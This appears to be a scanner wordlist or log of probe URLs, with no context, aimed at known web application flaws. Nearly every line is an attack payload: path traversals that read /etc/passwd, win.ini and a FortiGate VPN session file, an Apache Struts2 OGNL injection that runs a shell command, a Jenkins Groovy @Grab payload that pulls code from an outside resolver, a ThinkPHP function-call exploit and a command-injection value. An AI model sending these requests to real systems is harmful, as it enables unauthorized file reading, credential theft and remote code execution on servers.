/dumpmdm.cmd
/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0a@GrabResolver(name=%27test%27,%20root=%27http://aaa%27)%0a@Grab(group=%27package%27,%20module=%27vulntest%27,%20version=%271%27)%0aimport%20Payload;
/server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../etc/passwd
/server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../Windows/win.ini
/cgi-bin/login?LD_DEBUG=files
/index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd
/html/log
/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
/../../etc/passwd
/wp-content/plugins/chained-quiz/readme.txt
/filemanager/upload.php
/webui/file_guest?path=/var/www/documentation/../../../../../etc/passwd&flags=1152
/wp-content/plugins/wechat-broadcast/wechat/Image.php?url=../../../../../../../../../../etc/passwd
/blast/nph-viewgif.cgi?../../../../etc/passwd
/api/console/api_server?sense_version=%40%40SENSE_VERSION&apis=../../../../../../../../../../../etc/passwd
/enginemanager/server/logs/download?logType=error&logName=../../../../../../../../etc/passwd&logSource=engine
/wp-content/plugins/wp-payeezy-pay/donate.php
/ws_utc/config.do
/wp-admin/options-general.php?page=smartcode
/anchor/errors.log
/user/scripts/login_par.js
/Admin
/device.rsp?opt=user&cmd=list
/%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27cat%20/etc/passwd%27%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B51020%5D%2C%23c.read%28%23d%29%2C%23sbtest%3D@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29%2C%23sbtest.println%28%23d%29%2C%23sbtest.close%28%29%29%7D/actionChain1.action
/meta
/cgit/cgit.cgi/git/objects/?path=../../../../../../../etc/passwd
/theme/default/img/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e//etc/passwd
/
/index.php?option=com_zhbaidumap&no_html=1&format=raw&task=getPlacemarkDetails
/index.php?option=com_prayercenter&task=confirm&id=1&sessionid=1
/modules/bamegamenu/ajax_phpcode.php?code=print(md5({{num}}))
?s=index/think\\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
/upgrade_handle.php?cmd=writeuploaddir&uploaddir=%27;id;%27
/type.php?template={{payload}}
/data/cache_template/rss.tpl.php
